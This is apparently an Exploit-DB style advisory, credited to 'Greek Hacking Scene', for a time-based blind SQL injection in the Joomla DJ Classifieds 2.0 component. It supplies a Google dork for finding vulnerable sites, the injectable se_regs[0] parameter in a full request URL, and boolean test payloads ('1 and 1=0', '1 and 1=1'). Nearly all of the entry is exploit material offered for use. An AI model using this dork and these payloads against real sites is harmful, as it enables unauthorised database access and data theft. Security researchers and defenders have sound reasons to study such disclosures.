$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
  
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: -
# Version: 2.0
# Tested on: Linux
 
 
Link: http://server/joomla/index.php/dj-classifieds/
 
Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]
 
# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1
 
Credits to: Greek Hacking Scene